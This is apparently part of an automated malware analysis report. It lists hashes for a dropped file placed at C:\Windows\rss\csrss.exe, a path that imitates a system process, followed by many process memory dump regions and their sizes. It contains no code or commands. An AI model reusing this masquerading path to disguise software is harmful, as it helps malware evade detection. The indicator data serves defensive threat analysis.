3f22bd82ee1b38f439e6354c60126d6d
SHA163b57d818f86ea64ebc8566faeb0c977839defde
SHA256265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
C:\Windows\rss\csrss.exeMD5
907b8a8bacc5432518151b830339539d
SHA19d5a934d1291db04f88482e2c3e5f3053552e044
SHA25661727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f
SHA5128129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622
-
C:\Windows\rss\csrss.exeMD5
907b8a8bacc5432518151b830339539d
SHA19d5a934d1291db04f88482e2c3e5f3053552e044
SHA25661727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f
SHA5128129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622
-
memory/384-234-0x0000000000740000-0x0000000000784000-memory.dmpFilesize
272KB
-
memory/384-231-0x00000000004A0000-0x00000000004C7000-memory.dmpFilesize
156KB
-
memory/384-235-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/404-157-0x0000000004360000-0x0000000004372000-memory.dmpFilesize
72KB
-
memory/404-146-0x0000000002284000-0x00000000022A7000-memory.dmpFilesize
140KB
-
memory/404-188-0x0000000003FF0000-0x0000000003FF1000-memory.dmpFilesize
4KB
-
memory/404-184-0x00000000001C0000-0x00000000001F0000-memory.dmpFilesize
192KB
-
memory/404-183-0x0000000002284000-0x00000000022A7000-memory.dmpFilesize
140KB
-
memory/404-189-0x0000000003FF2000-0x0000000003FF3000-memory.dmpFilesize
4KB
-
memory/404-156-0x0000000007030000-0x0000000007648000-memory.dmpFilesize
6.1MB
-
memory/404-155-0x0000000006A80000-0x0000000007024000-memory.dmpFilesize
5.6MB
-
memory/404-158-0x0000000007650000-0x000000000775A000-memory.dmpFilesize
1.0MB
-
memory/404-187-0x0000000072230000-0x00000000729E0000-memory.dmpFilesize
7.7MB
-
memory/404-159-0x0000000004380000-0x00000000043BC000-memory.dmpFilesize
240KB
-
memory/404-190-0x0000000003FF3000-0x0000000003FF4000-memory.dmpFilesize
4KB
-
memory/404-191-0x0000000003FF4000-0x0000000003FF6000-memory.dmpFilesize
8KB
-
memory/404-186-0x0000000000400000-0x000000000216E000-memory.dmpFilesize
29.4MB
-
memory/624-238-0x0000000002150000-0x00000000021B0000-memory.dmpFilesize
384KB
-
memory/632-244-0x0000000010000000-0x0000000010D56000-memory.dmpFilesize
13.3MB
-
memory/828-239-0x0000000002120000-0x0000000002180000-memory.dmpFilesize
384KB
-
memory/836-236-0x0000000002120000-0x0000000002180000-memory.dmpFilesize
384KB
-
memory/1444-297-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/1444-295-0x0000000000790000-0x00000000007D4000-memory.dmpFilesize
272KB
-
memory/1496-298-0x00007FFE663D0000-0x00007FFE66E91000-memory.dmpFilesize
10.8MB
-
memory/1496-299-0x000000001C690000-0x000000001C692000-memory.dmpFilesize
8KB
-
memory/1568-181-0x0000000002E00000-0x000000000323D000-memory.dmpFilesize
4.2MB
-
memory/1568-185-0x0000000000400000-0x0000000002584000-memory.dmpFilesize
33.5MB
-
memory/2712-214-0x0000000002130000-0x0000000002190000-memory.dmpFilesize
384KB
-
memory/2760-133-0x0000000000AC0000-0x0000000000AEA000-memory.dmpFilesize
168KB
-
memory/2760-136-0x00007FFE67680000-0x00007FFE68141000-memory.dmpFilesize
10.8MB
-
memory/2788-294-0x0000000005720000-0x0000000005721000-memory.dmpFilesize
4KB
-
memory/2788-232-0x0000000072230000-0x00000000729E0000-memory.dmpFilesize
7.7MB
-
memory/2788-229-0x0000000000CD0000-0x0000000000CE8000-memory.dmpFilesize
96KB
-
memory/3020-237-0x0000000002180000-0x00000000021E0000-memory.dmpFilesize
384KB
-
memory/3032-182-0x0000000000FA0000-0x0000000000FB5000-memory.dmpFilesize
84KB
-
memory/3508-240-0x0000000002110000-0x0000000002170000-memory.dmpFilesize
384KB
-
memory/3708-303-0x00007FFE663D0000-0x00007FFE66E91000-memory.dmpFilesize
10.8MB
-
memory/3936-271-0x00000000035B0000-0x000000000376E000-memory.dmpFilesize
1.7MB
-
memory/3944-175-0x0000000000400000-0x0000000002584000-memory.dmpFilesize
33.5MB
-
memory/3944-173-0x0000000002A9B000-0x0000000002ED8000-memory.dmpFilesize
4.2MB
-
memory/3944-174-0x0000000002EE0000-0x0000000003807000-memory.dmpFilesize
9.2MB
-
memory/4212-166-0x0000000002EB9000-0x0000000002ECA000-memory.dmpFilesize
68KB
-
memory/4212-167-0x0000000002C90000-0x0000000002C99000-memory.dmpFilesize
36KB
-
memory/4212-168-0x0000000000400000-0x0000000002B48000-memory.dmpFilesize
39.3MB
-
memory/4212-149-0x0000000002EB9000-0x0000000002ECA000-memory.dmpFilesize
68KB
-
memory/4216-293-0x000000001CAE0000-0x000000001CAE2000-memory.dmpFilesize
8KB
-
memory/4216-292-0x00007FFE663D0000-0x00007FFE66E91000-memory.dmpFilesize
10.8MB
-
memory/4216-289-0x0000000000710000-0x00000000007D6000-memory.dmpFilesize
792KB
-
memory/4296-228-0x0000000000EC0000-0x0000000000EE0000-memory.dmpFilesize
128KB
-
memory/4296-230-0x0000000072230000-0x00000000729E0000-memory.dmpFilesize
7.7MB
-
memory/4296-251-0x0000000005AB0000-0x0000000005B26000-memory.dmpFilesize
472KB
-
memory/4296-254-0x0000000005BD0000-0x0000000005C62000-memory.dmpFilesize
584KB
-
memory/4296-259-0x00000000065E0000-0x00000000065FE000-memory.dmpFilesize
120KB
-
memory/4296-268-0x00000000066A0000-0x0000000006706000-memory.dmpFilesize
408KB
-
memory/4296-233-0x0000000005650000-0x0000000005C68000-memory.dmpFilesize
6.1MB
-
memory/4296-282-0x0000000007DC0000-0x0000000007F82000-memory.dmpFilesize
1.8MB
-
memory/4296-285-0x00000000084C0000-0x00000000089EC000-memory.dmpFilesize
5.2MB
-
memory/4436-194-0x0000000003FF0000-0x00000000041AE000-memory.dmpFilesize
1.7MB
-
memory/4684-296-0x00000000004D9000-0x00000000004E2000-memory.dmpFilesize
36KB
-
memory/4684-301-0x00000000004A0000-0x00000000004A9000-memory.dmpFilesize
36KB
-
memory/4684-300-0x00000000004D9000-0x00000000004E2000-memory.dmpFilesize
36KB
-
memory/4684-302-0x0000000000400000-0x000000000046B000-memory.dmpFilesize
428KB
-
memory/4692-177-0x00000000028DC000-0x0000000002D19000-memory.dmpFilesize
4.2MB
-
memory/4692-179-0x0000000000400000-0x0000000002584000-memory.dmpFilesize
33.5MB
-
memory/4772-171-0x00000000048D0000-0x00000000048D8000-memory.dmpFilesize
32KB
-
memory/4772-170-0x00000000048D0000-0x00000000048D8000-memory.dmpFilesize
32KB
-
memory/4772-180-0x0000000000400000-0x00000000006A8000-memory.dmpFilesize
2.7MB
-
memory/4988-243-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/4988-242-0x00000000021A0000-0x000000000224C000-memory.dmpFilesize
688KB
-
memory/4988-241-0x0000000000819000-0x0000000000885000-memory.dmpFilesize
432KB
-
memory/4988-221-0x0000000000819000-0x0000000000885000-memory.dmpFilesize
432KB